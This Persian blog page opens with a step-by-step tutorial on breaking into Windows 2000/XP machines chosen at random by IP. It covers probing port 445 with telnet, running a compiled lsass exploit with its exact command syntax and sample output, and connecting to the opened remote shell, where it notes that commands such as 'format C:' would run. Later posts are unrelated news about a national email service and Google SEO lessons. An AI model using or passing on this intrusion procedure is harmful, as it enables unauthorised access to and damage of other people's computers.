مطلبي كه در اينجا ميخوانيد يكمي پيچيده است بنابراين اصلا نگران نباشيد گام به گام با اين متن پيش برويد سعي ميكنم خيلي ساده عنوان كنم اصلا نگران نباشيد
خلاصه كاري كه ما ميكنيم اين است كه ما با كارهاي زير ميخواهيم به ويندوز 2000 يا ايكس پي حمله كنيم از بيرون دستگاه بدون اينكه به قرباني فايلي بديم اجرا كنه يا هر ارتباط ديگري با قرباني داشته باشيم يعني ميخوايم خيلي حرفه اي نه مثل اين هكر هاي تازه كار كه تروجان ميدن به مردم خيلي حرفه اي خودمان ميخوايم يك پورت روي دستگاه قرباني باز كنيم بدون اينكه حتي يك كلمه هم با قرباني حرف بزنيم خوب حالا كه فهميديد چيكار ميخوام بكنيم من يكبار ديگه هم خلاصه بگم يك اي پي انتخاب ميكنيد و بعد هكش ميكنيد اولين كاري كه ميكنيم اين است كه اي پي مورد نظر يا همان قرباني را براي باز بودن پورت 445 امتحان ميكنيم
Start->run->CMD
را براي باز كردن يك صفحه كامند پرومت بزنيد و بعد با دستور
telnet ip 445
امتحان ميكنيم كه ايا پورت 445 باز است يا نه البته شما اگر حرفه اي هستيد حتما مثل هكر هاي حرفه اي براي
اين كارها يك برنامه خاص را استفاده ميكني بنا به سليقه خودتان كه از چه برنامه اي خوشتان مياد ولي در اينجا
از دستوراتي استفاده ميكنيم كه هر كسي خواست اين كار را انجام بدهد نياز به برنامه خاصي نداشته باشه و با كمترين امكانات ميخوايم به نتيجه برسيم
خوب توجه كنيد به جا اي پي در دستور بالا بايد اي پي قرباني را وارد كنيد و اگر اين دستور را وارد كرديد و اتصال برقرار شد يعني پورت 445 باز است پس گام اول را برداشتيد و اگر اتصال برقرار نشد و پيغام خطا دريافت كرديد قرباني شما به اين نوع حمله نفوذ پذير نيست
خوب حالا به گام دوم ميرويم در زير كد هاي حمله به اين پورت را مشاهده ميكنيد اين كدها را بايد كامپايل بفرمائيد و فايل اجرايي كه بدست مي اوريد را بصورت زير استفاده ميكنيد
expl [options]
در خط بالا طرز استفاده به اين ترتيب است اولين كلمه expl نام فايل اجرايي است كه بعد از كامپايل ايجاد كرديد target يك عدد يك رقمي است كه مقدار 0 براي ويندوز ايكس پي است و مقدار 1و2 براي ويندوز 2000 است در اخر اين نوشته طرز تشخيص اينكه كدام عدد را استفاده كنيد يعني از كجا بفهميد قرباني ويندوز ايكس پي است كه 0 بزنيد يا قرباني ويندوز 2000 است كه 1 يا 2 بزنيد را ميخوانيد
victim ip همان اي پي قرباني شما است كه پورت 445 ان باز بود
binport شماره پورتي است كه ميخواهيد روي دستگاه قرباني براي شما باز بشود و به ان پورت وصل بشويد و قرباني را هك كنيد
option يك دستور است كه در ادامه تك دستور اين برنامه را توضيح ميدهم
خوب دوست من كار بسيار ساده است فرض كنيد اي پي قرباني من 217.0.0.1 است و من طبق ان چيزهايي كه بالا گفتم اين كارهاي را به تريتب انجام ميدهدم
1- Start --> Run --> CMD
2- Telnet 217.0.0.1 445
3- اگر وصل شد از برنامه حمله كه قبلا كامپال كردم و الان اماده استفاده است استفاده ميكنم
4- پنجره قبلي را كه در 2 دستور قبل باز كردم ميبندم
5- Start->Run->CMD
6-expl.exe 0 217.0.0.1 24745
----بعد از اينكه دستور خط 6 را زدنيد اين نوشته ها را مشاهده ميكنيد----
*[*] Target: IP: 217.0.0.1: OS: winXP [universal] lsass.exe
*[*] Connecting to 217.0.0.1:445 ... OK
*[*] Attacking ... OK
7-حمله انجام شد و پورت مورد نظر شما كه در خط شماره 6 من شماره پورت 24745 را انتخاب كردم الان باز شده تا ما وارد دستگاه قرباني بشويم
8-Start-->Run-->CMD
9-telnet 217.0.0.1 24745
10-به احتمال 95 درصد شما موفق شديد دستگاه قرباني را هك كنيد و اين خطوط را مشاهده خواهيد كرد
* Microsoft Windows XP [Version 5.00.2600]
* (C) Copyright 1985-2001 Microsoft Corp.
*
* C:WINNTsystem32>
11- دوست من در اين جا شما هر دستوري بزنيد روي دستگاه قرباني اجرا ميشود مثل اگر بزنيد format C: مي توانيد هارد قرباني را فرمت كنيد
ولي توجه كنيد يك هكر در اوج قدرت دست به خرابكاري نميزنه !!! پس هر كاري خواستيد بكنيد ولي خرابكاري نه !!!
و اما چطوري تشخيص بدهيد كه دستگاه قرباني شما ويندوز 2000 است كه از عدد 1 يا 2 استفاده كنيد يا ويندوز ايكس پي هست كه از عدد0 استفاده كنيد ؟ شما كافي است كه همان دستور بالا را كه براي حمله استفاده مكنيد بزنيد و فقط به اخرش -t اضافه كنيد يعني اينطوري
expl 0 217.0.0.1 24745 -t
بعد از زدن اين دستور برنامه به شما نسخه ويندوز را اعلام ميكند اگر نسخه ويندوز را winnt 5.0اعلام كرد يعني ويندوز 2000 است و شما عدد 1 يا 2 استفاده كنيد و اگر winnt 5.1 را اعلام كرد ويندوز ايكس پي است

اميدوارم كه مطلب بالا مورد استفاده شما قرار گرفته باشد توجه كنيد براي اينكه همه بتوانند اين مطلب را استفاده كنند مجبور شدم كه خيلي جاها را ساده كنم ولي در سورس اصلي برنامه ميتوانيد به اصل دستور عمل ها پی ببريد .
توجه به اين نكته ضروري است كه با اين روش شما هر اي پي را كه بخواهيد ميتوانيد به احتمال 80% هك كنيد استفاده از مطلب بالا فقط درصورتيكه هدف شما يادگيري و افزايش معلومات باشد مجاز ميباشد


:: موضوعات مرتبط: اینترنت , برنامه نویسی , ترفندستان , ,



ايميل ملي فعال شد
نوشته شده در 18 آبان 1389
بازدید : 46
نویسنده : مولوی

جام جم آنلاين: معاون توسعه و مديريت شبکه سازمان فناوري اطلاعات ايران از آمادگي ارائه ايميل ملي براي تمام کاربران ايراني خبر داد و گفت: ظرفيت ارائه خدمات ايميل براي تمام متقاضيان پست الکترونيکي فراهم شد.

به گزارش مهر، علي اصغر انصاري سه شنبه در نشست خبري با اشاره به فعاليت پورتال iran.ir  که در راستاي ضوابط اجرايي بودجه سال 86 به وزارتخانه ارتباطات تصويب شد گفت: تا کنون هزار و 16 خدمت الکترونيکي از طريق اين درگاه براي تمامي مردم فراهم شده است.

وي با بيان اين که هزار و شانزدهمين خدمت الکترونيکي امروز و در حاشيه شانزدهمين نمايشگاه بين‌المللي الکامپ راه اندازي شده است گفت: اخذ دفترچه بيمه از طريق اينترنت هزار و شانزدهمين خدمت الکترونيکي است که از طريق وزارت رفاه و تامين اجتماعي در پرتال iran.ir قرار گرفته است.

وي همچنين از آغاز پروژه تدوين برنامه جامع صادرات نرم افزاري در کشور خبر داد و گفت: يکي از پتانسيل‌هاي کشور توليد نرم افزار است که به علت عدم مديريت مناسب و يکپارچه مغفول مانده است. به همين دليل مديريت توانمند داخلي براي صادرات نرم افزار يکي از مواد 49 برنامه پنجم توسعه است که مي‌تواند تاثير بسزايي در صنعت فناوري اطلاعات و توليد ناخالص ملي داشته باشد.

انصاري با بيان اينکه اين طرح با همکاري وزارتخانه‌هاي بازرگاني و فرهنگ و ارشاد تدوين خواهد شد، ادامه داد: با اين طرح ضوابط کالا و خدمات و محصولات نرم افزاري تدوين مي‌شود.

وي همچنين از ادغام دو پرتال iran.irو iranmardom.irخبر داد و گفت: اين دو درگاه به فعاليت‌هاي خود ادامه خواهند داد اما با توجه به ظرفيت‌هاي موجود درصدد تعامل و هماهنگ‌سازي براي ادغام اين دو درگاه هستيم اما به جمع‌بندي اينکه دسترسي از طريق يک آدرس يا هر دو آدرس صورت گيرد نرسيده‌ايم.

معاون توسعه و مديريت شبکه سازمان فناوري اطلاعات ايران گفت: ‌درگاه iran.irهمچنان خدمات الکترونيکي خود را عرضه مي‌کند و درگاه iranmardom نيز در بحث اطلاع رساني خدمات الکترونيکي فعاليت خواهد داشت.

رتبه بندي شرکت‌هاي فعال حوزه فناوري اطلاعات

رئيس سازمان فناوري اطلاعات از رتبه بندي شرکت هاي فعال حوزه نرم افزار، سخت افزار و فناوري اطلاعات تا دو سه هفته آينده خبر داد و گفت: هم اکنون رتبه بندي شوراي عالي انفورماتيک در مورد شرکت‌هاي فناوري اطلاعات انجام مي‌شود اما يک سري نقائصي وجود دارد که سازمان فناوري اطلاعات با استفاده از اساسنامه و قانون مناقصات خود مجوز لازم براي فراخوان و رتبه بندي شرکت هاي فعال در حوزه IT را دريافت کرده است.

وي با بيان اينکه فهرست شرکتها تا چند ماه آينده اعلام مي‌شود، گفت: شرکت‌ها شناسايي شده و توانمندي و رتبه آنها در سامانه معاونت نظارت راهبردي رياست جمهوري اعلام خواهد شد.

رئيس سازمان فناوري اطلاعات با اشاره به محورهاي مديريتي، مالي، تجاري، فني و نيروي انساني براي احراز صلاحيت شرکت‌هاي فعال در اين حوزه خاطرنشان کرد: نبود اطلاعات در مورد شرکت‌هاي فعال نقص بزرگي است که با وجود اين سامانه اين نقص برطرف شده و شرکت‌هاي داخلي ذينفع خواهند بود.

وي از تمامي شرکت هاي فعال در اين عرصه درخواست کرد که اطلاعات کاري خود را در اختيار اين بانک اطلاعاتي منسجم قرار دهند.

انصاري در مورد ايميل ايراني قابل ارائه از طريق درگاه خدمات الکترونيکي ايران گفت: فضاي نامحدود براي اين سرويس در نظر گرفته شده و نه تنها مديران دولتي بلکه کاربران اينترنتي نيز مي‌توانند از اين سرويس استفاده کنند.

وي هدف اوليه و اساسي اين طرح را کارمندان دولت و مديران اعلام کرد و گفت: ‌اصراري براي استفاده مردم از اين سرويس نيست اما با توجه به ترافيک پهناي باند بين‌الملل استفاده از اين ايميل مي‌تواند ميزان ترافيک را کاهش دهد.


:: موضوعات مرتبط: نرم افزار , اینترنت , خواندنی های روز , ,



گوگل و وبلاگ شما(درس نهم)
نوشته شده در 18 آبان 1389
بازدید : 49
نویسنده : مولوی

برای آنکه گوگل بتواند لینک یک صفحه را در نتایج جستجوهایش به نمایش در آورد پیش از هر چیز باید آن صفحه را شناسایی کرده باشد. گوگل از دو راه می تواند صفحات جدید را شناسایی کند یک راه این است که گوگل هنگام بازدید از یک صفحه تمام لینکهایی که در آن صفحه قرار دارند (در آن صفحه لینک شده اند) را نیز به دایرکتوری خود اضافه کند و سپس با رفتن به هر کدام از آن لینک ها، لینکهای جدیدتر را نیز کشف کند. و به این ترتیب به شیوه ای درختی لینکها به گوگل اضافه می شوند به همین دلیل است که برخی از روبات گوگل با عنوانهایی مانند خزنده ی گوگل یا اسپایدر (عنکبوت) گوگل یاد می کنند.
پس در اینجا می توان به یکی دیگر از اهمیتهای درس قبلی پی برد و هر چه لینکهای داده شده به یک صفحه بیشتر باشد مطمئنا گوگل سریعتر آن صفحه را خواهد یافت. از نکات قابل توجه این است که گوگل از صفحات پر اهمیت تر ( صفحاتی که پیج رنک گوگل بالاتری دارند) در فاصله ی زمانی کمتری بازدید می کند.

اما راه دوم برای اینکه گوگل یک صفحه ی اینترنتی را شناسایی کند شناساندن دستی است که برای این کار کافی است به لینک http://www.google.com/addurl/?continue=/addurl بروید و در قسمت url آدرس وبلاگ و در قسمت کامنت توضیح کوتاهی درباره ی وبلاگ خود وارد کرده و با وارد نمودن متن تایید دکمه ی add url را کلیک کنید تا لینک شما اضافه شود.

اما در هر صورت نباید انتظار داشته باشید که گوگل سریع لینک را قبول کرده و آنرا در نتایج به نمایش در آورد.

برای مطمئن شدن از اینکه گوگل آن لینک را پذیرفته یا خیر می توانید با جستجوی عبارت site:yoursite.com در گوگل از این موضوع اطمینان حاصل کنید (به جای عبارت yoursite.com آدرس وبلاگ خود مثل mjmafi.blogfa.com را وارد کنید) مثلا در لینک http://www.google.com/search?q=site:blog-fa.com مشخص شده است که لینک سایت blog-fa.com پذیرفته شده همچنین تمام لینکهایی که وابسته به این آدرس هستند و در گوگل پذیرفته شده اند نیز به نمایش در خواهند آمد عدم نمایش لینک نشانگر آن است که گوگل هنوز آن صفحه را شناسایی نکرده است. (برای تست مطالب جدید تر هم می توانید لینک اختصاصی آن مطلب را به جای عبارت yoursite.com قرار دهید مانند : http://www.google.com/search?q=site:blog-fa.com/post-155.aspx )

در صورتی که نتیجه ای به نمایش در نیامد احتمال زیادی وجود دارد که لینک مورد نظر شما یک لینک جدید باشد یا نه به آن لینکی ایجاد شده و نه به گوگل به طور دستی معرفی شده باشد. اما نگران نباشید زیرا در هر صورت مدت یک ساعت الی دو هفته زمان نیاز است که لینک های جدید با وجود ایجاد لینک و یا معرفی دستی نیز به دایرکتوری گوگل اضافه شوند...


:: موضوعات مرتبط: نرم افزار , اینترنت , وبلاگ نویسان , ,



گوگل و وبلاگ شما(درس هشتم)
نوشته شده در 18 آبان 1389
بازدید : 51
نویسنده : مولوی

اگر بگویم اهمیت این درس به اندازه ی همه ی درسهای گذشته است شاید اغراق نکرده باشم اما از آنجا که در اینجا مبحث رقابت مطرح است (رقابت برای بدست آوردن رتبه ی بهتر در نتایج گوگل) و همچنین از آنجا که مرحله ی طراحی (که در درسهای قبلی به نحوه ی به آن پرداخته شد) قبل از مراحل دیگر قرار دارد این بحث را به درس هشتم موکول کردم، بحث " لینک " یا به بیان عامیانه تر در میان وبلاگ نویسان " تبادل لینک " است.

دقت فرمایید منظور بنده صرفاً این نیست که شما با وبلاگها یا وبسایتهای بیشتری تبادل لینک کنید زیرا تبادل لینک به این معناست که در ازای درج لینک، لینک شوید، بلکه منظور من این است که لینکهای داده شده به وبلاگ خود را افزایش دهید و البته بدیهی است که یکی از راه های افزایش لینک های داده شده به وبلاگ شما تبادل لینک است.

در واقع یکی از مهمترین پارامترهایی که گوگل برای رتبه بندی صفحات در نظر می گیرد تعداد لینکهای داده شده به یک صفحه است (البته با تاثیر دادن همزمان پارامترهایی که در درسهای گذشته به آنها پرداخته شد).

البته فقط لینک شدن ملاک نیست بلکه اینکه با چه عبارتی لینک شوید هم بسیار حائز اهمیت است زیرا وقتی در صفحات بسیاری به یک صفحه ی مشخص با عبارتی مشخص لینک داده می شود گوگل به این نتیجه می رسد که این صفحه یک صفحه ی تخصصی در رابطه با آن کلمه است و به همین دلیل جایگاه آن را در نتایج جستجو ارتقاء می دهد مثلا خود شما (و بسیاری وبلاگنویسان و وبمسترها) ممکن است در وبلاگتان به عنوان لینکدونی یا ... به صفحاتی مثل خود سایت گوگل با کلمه "گوگل" یا به سایت یاهو با عنوان "یاهو" لینک دهید یا به سایت بلاگفا با عنوان "بلاگفا" لینک دهید، و این کار باعث می شود لینکهای داده شده به این سایت با آن عبارت افزایش یابد و آن صفحات در جستجوی آن کلمه در نتایج برتر به نمایش درآیند.

حتی بر اساس این مقوله بمب های گوگلی را می توان منفجر کرد (بمب گوگلی به این معناست که به یک صفحه با عبارت مورد نظر آنقدر لینک داده شود تا گوگل آن صفحه را در نتیجه ی برتر به نمایش در آورد که این کار اغلب با هدفهای سیاسی و تجاری انجام می پذیرد)

بگزارید یک مثال ایرانی از بمب گوگلی برایتان بزنم تا این درس را بهتر متوجه شوید: چند سال پیش که بحث خلیج عربی (به جای خلیج فارس) را مطرح کردند(در گوگل و برخی موسسات بین المللی) از آنجا که این مساله را هیچ ایرانی نمی توانست تحمل کند بمب گوگلی Arabian gulf طراحی و منفجر شد به این صورت که یک ایرانی صفحه ای با عنوان Arabian gulf طراحی کرد و در متن آن پیام خود را قرار داد (صفحه ای شبیه به پیامی که اینترنت اکسپلورر هنگام عدم دسترسی به یک صفحه نشان می دهد با متن The Gulf You Are Looking For Does Not Exist. Try Persian Gulf. به معنی خیلج مورد نظر یافت نشد . خیلج فارس را امتحان کنید) به این ترتیب هنگامی که کسی در هر کجای دنیا در گوگل عبارت مجعول arabian gulf را جستجو کند با این صفحه در نتیجه اول گوگل بر خورد خواهد کرد جالب است بدانید این کار در کمتر از چند روز به وسیله ی تعداد بسیار زیاد لینکهایی که از طرف وبلاگنویسان و وبمسترهای ایرانی به این صفحه داده شد اتفاق افتاد. نکته این بود که برای عملی شدن این طرح وبلاگ نویسان باید فقط با عبارت Arabin gulf به این صفحه لینک می دادند، نه کمتر نه بیشتر....

البته در اینجا تنها کمیت صفحاتی که به شما لینک می دهند شرط نیست بلکه کیفیت آن ها نیز مهم است، و مهمترین پارامتر برای تشخیص کیفیت یک صفحه از لحاظ تاثیر گزاری در رتبه ی شما در گوگل پیج رنک گوگل آن صفحه است که هرچه پیج رنک بالاتر باشد تاثیر گذاری آن نیز بیشتر است.

نکته ی دیگری که باید توضیح دهم این است که مهم نیست لینک شما در کجای یک صفحه باشد و اهمیتی ندارد که کسی روی آن کلیک کند یا خیر بلکه مهم این است که لینک شما وجود داشته باشد.

خوب حال ما به عنوان یک وبلاگ نویس چگونه می توانیم لینکهای داده شده به وبلاگمان را افزایش دهیم؟ برای این کار راههای زیادی وجود دارد که برخی از آنها را در ادمه عنوان می کنم:

1-ارزانترین و ساده ترین کار تبادل لینک است به این معنا که در ازای لینک دادن دیگران به شما نیز به آنها لینک دهید.(برای اینکار می توانید به وبلاگهای دیگران سر بزنید و به آنها پیشنهاد تبادل بدهید البته این کار هم دارای نکات دیگری است که سعی خواهم کرد در مقاله ای دیگر به آن بپردازم)

2-ثبت لینک در دایرکتوری ها و لیستهای اینترنتی.(در این وبلاگ برخی از آنها معرفی شده یا خواهند شد)

3-ثبت لینک با پرداخت مبلغی به سایتهایی که جایگاه ویژه ای در گوگل دارند و این کار را برای شما انجام می دهند.

4- اگر کیفیت مطالب شما ارتقا یابند به نجوه ی که بسیار منحصر به فرد باشند بزودی افراد بسیاری در وبلاگهایشان شما را در قسمت لینک دونی لینک شما را ثبت خواهند کرد.

توجه داشته باشید که همانگونه که در درسهای پیشین تاکید کردم این که شما از چه کلماتی برای لینک شدن با آن استفاده کنید بهتر است با سایر قسمت ها هماهنگ باشد و از کلمات کلیدی استفاده شود.


:: موضوعات مرتبط: نرم افزار , اینترنت , وبلاگ نویسان , ,



گوگل و وبلاگ شما(درس هفتم)
نوشته شده در 18 آبان 1389
بازدید : 43
نویسنده : مولوی

حتی اگر وبلاگ شما به عکس و تصویر اختصاص نداشته باشد احتمال فراوانی دارد در هر مطلبی که به وبلاگ ارسال می کنید از تصاویر نیز استفاده کنید . نقش تصاویر در بالا بردن آمار یک وبلاگ از طریق گوگل تقریباً به همان اندازه ی متن است و در برخی موضوعات ممکن است دارای نسبت بیشتر یا کمتری باشد و اغلب آمار وبلاگهای با موضوع عکس و تصویر به سرعت زیادی از طریق بخش images.google.com افزایش پیدا می کند. اما اینکه تصاویر در نتایج برتر به نمایش درآیند مستلزم رعایت نکاتی است که حتی این نکات بر روی رتبه بندی قسمت متن هم تأثیر می گذارد.

  • مهمترین بخشی که گوگل به آن توجه می کند تا به این نتیجه برسد که عکس مرتبط با کلمه ای است که مورد جستجو واقع شده است مرتبط است نام آن عکس یا وجود کلمات کلیدی در آدرس آن است به این معنی که اگر به آدرس تصاویر دقت کنید متوجه می شوید که تصاویر می توانند حاوی کلمات کلیدی باشند گرچه بعضی از آپلودسنترها پس از قرار دادن عکس نام آنرا بر اساس الگوهای خود تغییر می دهند اما در بسیاری از سرویسها این امکان در اختیار شماست که عکس را با همان نامی که در روی کامپیوتر شما بر روی اینترنت قرار دهید و از لینک آن در وبلاگ خود استفاده کنید گرچه ممکن است دست شما برای استفاده از کاراکترهای فارسی بسته باشد.
  • بخش مهم دیگر Alternate text یا متن جایگزین است که اغلب سرویسها به طور پیش فرض هنگام قرار دادن عکس در مطلب به شما این امکان را می دهند یک متن جایگزین برای عکس تعیین کنید که این متن در دو صورت به نمایش در خواهد آمد اول زمانی که کاربر نشانگر ماوس را روی عکس برای لحظه ای قرار دهد و دوم زمانی که به هر دلیلی تصویر نتواند به نمایش درآید (مثلا زمانی که تصویر به طور موقت در دسترس نباشد یا کاربر نمایش تصاویر را در مرورگر خود غیرفعال کرده باشد) پس همیشه از این بخش برای قرار دادن کلمات کلیدی که هم با عکس و هم با متن مرتبط باشد (حداکثر 200 کاراکتر) قرار دهید و اطمینان حاصل کنید که این ویژگی را خالی نگذاشته اید (این ویژگی در اچ تی ام ال همان شاخص Alt است)
  • در محیط ویندوز قبل از آپلود عکس رو آن کلیک راست کنید و گزینه ی Properties را انتخاب کنید و به لبه ی  Summary بروید در این بخش پارامترهایی وجود دارند که قرار دادن کلمات کلیدی در آنها در نهایت روی رتبه بندی تصاویر در موتورهای جستجو بی تأثیر نخواهد بود.
  • بهتر است تصاویر بر روی فضای خود شما قرار داشته باشند یعنی اگر عکس را از اینترنت دانلود می کنید ابتدا آنرا ذخیره کنید و سپس بر روی فضای خود قرار داده و از آن در وبلاگ استفاده کیند زیرا عکسی که قبلا در جایی دیگر توسط گوگل شناسایی شده است نمی تواند برای وبلاگ شما به راحتی رتبه ی مناسبی به دست آورد.

نکته ی بسیار مهمی که باز هم روی آن تاکید می کنم این است که در انتخاب پارامترهای فوق کلمات کلیدی می بایستی با متن ، خود عکس، و عنوان و ... هماهنگ و تا حد امکان ارتباط آنها مستقیم باشد.


:: موضوعات مرتبط: نرم افزار , اینترنت , وبلاگ نویسان , ,



گوگل و وبلاگ شما(درس ششم)
نوشته شده در 18 آبان 1389
بازدید : 41
نویسنده : مولوی

شاید قبل از شروع این درس لازم باشد توضیحی درباره ی متاتگها بدهم. متاتگها تگهایی هستند که در بین تگ هد (head) قرار می گیرند و معمولا توسط مرور گر به نمایش در نمی آیند بلکه حاوی راهنمایی هایی برای مرورگر و یا موتورهای جستجو هستند.

*عزیزانی که هیچ گونه آشنایی با کدهای اچ اتی ام ال ندارند پیشنهاد می شود ابتدا مطلب درباره ی اچ تی ام ال را مطالعه نمایند.

متاتگهای زیادی برای موتورهای جستجو وجود دارد که من در اینجا قصد ندارم تمام آنها را توضیح دهم اما به نظر میرسد دو متاتگ keywords و description برای جستجوگرهای اینترنتی از اهمیت بیشتری برخوردارند که شما می توانید هر دوی آنها را در بین تگ هد (

) از قالب وبلاگ خود پیدا کنید و به صورتهای زیر هستند.

متاتگ کی وردس (keywords) با معادل فارسی کلمات کلیدی به صورت زیر:

متاتگ دسکریپشن (description) با معال فارسی توضیحات به صورت زیر:

توجه داشته باشید که در قالب شما ممکن است طراح قالب تگهای مخصوص سرویس وبلاگ نویسی شما را قرار داده باشد تا بطور خودکار برخی عبارات با آنها جایگزین شود مثلا ممکن است در سرویس بلاگفا تگی که عنوان را مشخص می کند در تگ کی وردس قرار گیرد و به این ترتیب عنوان هر صفحه به عنوان یکی از کلمات کلیدی محسوب شود که کار بسیار صحیحی است و شما می بایست این عبارت را تغییر ندهید بلکه فقط کلمات مرتبط را علاوه بر آن بیافزایید و اگر کلمات غیر مرتبطی وجود دارد حذف نمایید همچنین در تگ توضیحات معمولا نویسندگان حرفه ای قالب وبلاگ ترتیبی می دهند تا توضیحاتی که کاربر  قبلا به عنوان توضیح وبلاگ در قسمتی همچون توضیحات وبلاگ وارد کرده است در این قسمت قرار گیرد.

حال ممکن است این سوال را از بنده داشته باشید که شما عملا باید چه کاری انجام دهید تا از این قسمت به نحو احسنت استفاده نمایید...

کلمات کلیدی:

شما باید در قسمت متاتگ keywords کلمات کلیدی مرتبط با وبلاگ خود را وارد کنید البته با در نظر گرفتن نکات زیر:
1- کلمات میبایسی با یک حرف کاما (،) از یکدیگر جدا شوند.
2- تعداد کل حروف (کاراکتر) هایی که در این قسمت قرار می گیرد بهتر است کمتر از سیصد حرف باشد(با در نظر گرفتن فاصله ها و کاما ها)
3- اگر کلمه ی کلیدی شما یک عبارت مانند "آموزش وبلاگ نویسی" است بهتر است سه کلمه یا کمتر باشد(ملاک برای تعداد کلمه فاصله های بین آنهاست)

توضیحات:

در قسمت متاتگ description یک توضیح کوتاه از وبلاگ خود قرار دهید که این توضیح باید به صورت یک جمله باشد و البته خود این جمله باید حاوی کلمات کلیدی باشد. معمولا این عبارت در هنگام لیست نتایج به عنوان توضیح در زیر لینک وبلاگ شما در نتایج گوگل خواهد آمد البته اگر این قسمت حاوی هیچ کلمه ی کلیدی نباشد گوگل به ناچار قسمتی از خود متن وبلاگ (که حاوی کلمات مورد نظر باشد) را نمایش خواهد داد. سعی نمایید تعداد کل کاراکترهای این قسمت هم بیشتر از 250 حرف (با احتساب فاصله ها) نباشد.

در صورت هرگونه ابهام آنرا در قسمت نظرات همین مطلب مطرح فرمایید


:: موضوعات مرتبط: نرم افزار , اینترنت , وبلاگ نویسان , ,



گوگل و وبلاگ شما(درس پنجم)
نوشته شده در 18 آبان 1389
بازدید : 44
نویسنده : مولوی

بعد از توضیح اهمیت وجود کلمات کلیدی در قسمت عنوان یک صفحه در جهت بدست آوردن رتبه ای برتر در نتایج جستجو به قسمت دیگری که یکی از بیشترین اهمیت ها را دارد می پردازیم یعنی خود متن مطلب یک صفحه (گرچه مکانی که در درس آینده به آن خواهم پرداخت نیز اهمیتی تقریبا به همین اندازه دارد).
معمولا مطالبی که از وبلاگها یا وبسایت های دیگر کپی برداری شده اند برای گوگل قابل تشخیص هستند و اغلب به آنها رتبه ای داده نمی شود هر چند که ممکن است در موارد نادری مطالب کپی شده بتوانند رتبه های بهتری کسب نمایند اما ما در اینجا فرض را بر این می گیریم که شما قصد کپی برداری ندارید و در واقع مطالب متعلق به خود شما هستند.
همیشه هنگامی که مطالب خود را برای انتشار بر روی وبلاگتان می نویسید به یاد داشته باشید که این متن یکی از همان جاهایی است که گوگل آن را برای یافتن کلمات کلیدی آنالیز خواهد کرد. اغلب می بینم که برخی وبلاگ نویسان و حتی گاهی برخی سایت ها و خصوصا سایتهای فروشگاهی در آخر مطلب خود کلماتی را با عنوان کلمات کلیدی و ... ذکر می کنند، یعنی کلمات را فهرست وار و بدون هیچ منطقی فقط در جهت بهبود رتبه ی خود در موتورهای جستجو می آورند که البته این ترفند تا حدودی مؤثر است اما به هیچ وجه کاری حرفه ای نیست. کار حرفه ای این است که این کلمات در خود متنی که کاربر آن را مطالعه می نماید وجود داشته باشد که این بستگی به ظرافت و تونایی نویسنده در جاگذاری کلمات در جمله ها دارد مثلا به دو جمله ی زیر دقت کنید:

  • در این جا شما یاد می گیرید که وبلاگ خود را برای گوگل بهینه کنید
  • این درس نحوه ی بهینه سازی و ارتقاء رتبه ی وبلاگ در موتور جستجوی گوگل را آموزش می دهد

منظور من از هر دو جمله ی بالا یک چیز است پس بهتر است من از عبارتی استفاده کنم که کلمات کلیدی بیشتری را در رابطه با آن مطلب داراست و یقیناً جمله دوم را انتخاب خواهم کرد.
گاهی با اضافه کردن یک حرف اضافه مانند (و = and ) یا (یا = or) و ... می توان کلمات کلیدی بیشتری را (بدون آنکه هدف شما برای قرار دادن کلمات کلیدی بیشتر نمایان باشد) وارد متن نمود یا هنگامی که کلمه ای می آورید معادل (یا مترادف) آنرا در داخل پرانتز هم بیاورید و بسیاری نکته های دیگر که پی بردن شما به آنها چیزیست که باعث تفاوت شما میان یک وبلاگنویس حرفه ای و غیر حرفه ای خواهد شد.
فراموش نکنید که هر کاری اندازه ای دارد و نباید تلاش برای افزودن کلمات کلیدی باعث طولانی شدن مطالب شما گردد.

در درس بعدی تگهایی که در بخش قالب هستند (متاتگ keywords و متاتگ description ) را شرح خواهم داد


:: موضوعات مرتبط: نرم افزار , اینترنت , وبلاگ نویسان , ,